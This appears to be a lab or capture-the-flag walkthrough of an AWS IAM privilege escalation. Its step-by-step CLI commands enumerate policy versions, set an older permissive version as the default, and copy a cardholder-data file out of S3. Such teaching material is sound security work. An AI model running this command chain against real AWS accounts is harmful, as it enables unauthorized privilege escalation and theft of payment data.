Overview

This lab demonstrates a real-world AWS misconfiguration where an attacker can abuse IAM policy version management to escalate privileges and exfiltrate sensitive data from S3. The attack chain: enumerate IAM policy versions → identify an overly permissive version → set it as default → access S3 → exfiltrate cardholder data.
Services abused: IAM, S3
Key permissions exploited: iam:GetPolicyVersion, iam:SetDefaultPolicyVersion
How AWS IAM Policy Versioning Works
AWS IAM managed policies support up to five versions. When a policy is updated, the old version is retained rather than deleted. Only one version is active at a time — this is the default version. The key insight for attackers: if a principal has iam:SetDefaultPolicyVersion, they can roll back to any previous version, including ones with broader permissions than the current default.
This is exactly the misconfiguration we will exploit.
Reconnaissance
Step 1 — Confirm identity and current permissions
Always start by confirming what credential you are operating with:
aws sts get-caller-identity
Step 2 — Enumerate policy versions
The current default policy (v1) grants List* and Get* on all IAM actions, plus crucially iam:SetDefaultPolicyVersion. This is enough to enumerate and roll back to any prior version.
List all available versions of the target policy:
aws iam list-policy-versions \
--policy-arn arn:aws:iam::014498641618:policy/policyforexploitableuser
Step 3 — Inspect each version
Inspect each version to identify which one grants the most useful permissions. Version 4 stands out:
aws iam get-policy-version \
--policy-arn arn:aws:iam::014498641618:policy/policyforexploitableuser \
--version-id v4
Output:
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:List*",
"s3:Get*"
],
"Resource": "*"
}
]
},
"VersionId": "v4",
"IsDefaultVersion": false,
"CreateDate": "2026-07-15T18:13:34+00:00"
}
}
Version 4 grants s3:List* and s3:Get* across all resources — full read access to every S3 bucket in the account. This is our target.
Exploitation
Step 4 — Set v4 as the default policy version
aws iam set-default-policy-version \
--policy-arn arn:aws:iam::014498641618:policy/policyforexploitableuser \
--version-id v4
No output means it succeeded. Our credential now has full S3 read access.
Step 5 — Enumerate S3 buckets
aws s3 ls
Step 6 — List bucket contents
aws s3 ls s3://iamrollback-cardholder-data-bucket-014498641618
A file named cardholder_data_primary.csv is present — this is the target.
Step 7 — Exfiltrate the data
aws s3 cp s3://iamrollback-cardholder-data-bucket-014498641618/cardholder_data_primary.csv .
Open the file to retrieve the flag.
Top comments (0)